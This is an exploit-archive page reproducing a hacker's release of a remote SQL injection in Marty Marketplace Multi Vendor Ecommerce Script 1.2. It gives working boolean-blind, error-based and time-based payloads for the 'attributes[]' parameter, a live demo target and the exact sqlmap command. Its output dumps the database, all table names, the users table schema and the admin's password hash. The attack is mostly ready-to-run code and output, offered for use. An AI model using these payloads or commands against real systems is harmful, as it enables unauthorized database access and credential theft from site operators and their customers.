Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070067

Below is a copy:

Marty Marketplace Multi Vendor Ecommerce Script 1.2 SQL Injection
                                     C r a C k E r                                    
                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  


               From The Ashes and Dust Rises An Unimaginable crack....          

                                       [ Exploits ]                                   

:  Author   : CraCkEr                                                                  :
  Website  : sangvish.com                                                             
  Vendor   : SangVish Technologies                                                    
  Software : Marty Marketplace Multi Vendor    Open Source Marketplace PHP script for 
             Ecommerce Script v1.2             eCommerce marketplace platforms        
  Vuln Type: Remote SQL Injection              in the market                          
  Method   : GET                                                                      
  Impact   : Database Access                                                          
                                                                                      
 
                              B4nks-NET irc.b4nks.tk #unix                             

:                                                                                        :
  Release Notes:                                                                        
                                                                           
  Typically used for remotely exploitable vulnerabilities that can lead to              
  system compromise.                                                                    
                                                                                        

                                                                                      


Greets:
       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
   loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear
       
   CryptoJob (Twitter) twitter.com/CryptozJob
   
   Special Greetz to The Lebanese National Basketball Team for the results of
   the FIBA Asia Cup

                                      CraCkEr 2022                                   


GET parameter 'attributes[]' is vulnerable
---
Parameter: attributes[] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)
---


Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6


[+] Starting the Attack

sqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch


[+] fetching current database

[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[INFO] retrieved: 'garudan_buy2marty'
current database: 'garudan_buy2marty'


[+] fetching tables for database: 'garudan_buy2marty'

Database: garudan_buy2marty
[105 tables]

+----------------------------------------+
| activations                            |
| ads                                    |
| ads_translations                       |
| audit_histories                        |
| categories                             |
| categories_translations                |
| contact_replies                        |
| contacts                               |
| dashboard_widget_settings              |
| dashboard_widgets                      |
| ec_brands                              |
| ec_brands_translations                 |
| ec_cart                                |
| ec_currencies                          |
| ec_customer_addresses                  |
| ec_customer_password_resets            |
| ec_customers                           |
| ec_discount_customers                  |
| ec_discount_product_collections        |
| ec_discount_products                   |
| ec_discounts                           |
| ec_flash_sale_products                 |
| ec_flash_sales                         |
| ec_flash_sales_translations            |
| ec_grouped_products                    |
| ec_order_addresses                     |
| ec_order_histories                     |
| ec_order_product                       |
| ec_orders                              |
| ec_product_attribute_sets              |
| ec_product_attribute_sets_translations |
| ec_product_attributes                  |
| ec_product_attributes_translations     |
| ec_product_categories                  |
| ec_product_categories_translations     |
| ec_product_category_product            |
| ec_product_collection_products         |
| ec_product_collections                 |
| ec_product_collections_translations    |
| ec_product_cross_sale_relations        |
| ec_product_label_products              |
| ec_product_labels                      |
| ec_product_labels_translations         |
| ec_product_related_relations           |
| ec_product_tag_product                 |
| ec_product_tags                        |
| ec_product_tags_translations           |
| ec_product_up_sale_relations           |
| ec_product_variation_items             |
| ec_product_variations                  |
| ec_product_with_attribute              |
| ec_product_with_attribute_set          |
| ec_products                            |
| ec_products_translations               |
| ec_reviews                             |
| ec_shipment_histories                  |
| ec_shipments                           |
| ec_shipping                            |
| ec_shipping_rule_items                 |
| ec_shipping_rules                      |
| ec_store_locators                      |
| ec_taxes                               |
| ec_wish_lists                          |
| failed_jobs                            |
| faq_categories                         |
| faq_categories_translations            |
| faqs                                   |
| faqs_translations                      |
| jobs                                   |
| language_meta                          |
| languages                              |
| media_files                            |
| media_folders                          |
| media_settings                         |
| menu_locations                         |
| menu_nodes                             |
| menus                                  |
| meta_boxes                             |
| migrations                             |
| mp_customer_revenues                   |
| mp_customer_withdrawals                |
| mp_stores                              |
| mp_vendor_info                         |
| newsletters                            |
| pages                                  |
| pages_translations                     |
| password_resets                        |
| payments                               |
| post_categories                        |
| post_tags                              |
| posts                                  |
| posts_translations                     |
| revisions                              |
| role_users                             |
| roles                                  |
| settings                               |
| simple_slider_items                    |
| simple_sliders                         |
| slugs                                  |
| tags                                   |
| tags_translations                      |
| translations                           |
| user_meta                              |
| users                                  |
| widgets                                |
+----------------------------------------+


[+] fetching columns for table 'users' in database 'garudan_buy2marty'

Database: garudan_buy2marty
Table: users
[15 columns]

+-------------------+---------------------+
| Column            | Type                |
+-------------------+---------------------+
| avatar_id         | int(10) unsigned    |
| created_at        | timestamp           |
| email             | varchar(191)        |
| email_verified_at | timestamp           |
| first_name        | varchar(191)        |
| id                | bigint(20) unsigned |
| last_login        | timestamp           |
| last_name         | varchar(191)        |
| manage_supers     | tinyint(1)          |
| password          | varchar(191)        |
| permissions       | text                |
| remember_token    | varchar(100)        |
| super_user        | tinyint(1)          |
| updated_at        | timestamp           |
| username          | varchar(60)         |
+-------------------+---------------------+


[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty'

Database: garudan_buy2marty
Table: users
[1 entry]

+----+----------+--------------------------------------------------------------+------------+-------------+
| id | username | password                                                     | super_user | permissions |
+----+----------+--------------------------------------------------------------+------------+-------------+
| 1  | admin    | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1          | NULL        |
+----+----------+--------------------------------------------------------------+------------+-------------+
                 Possible algorithms: bcrypt $2*$, Blowfish (Unix)


[-] Done

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.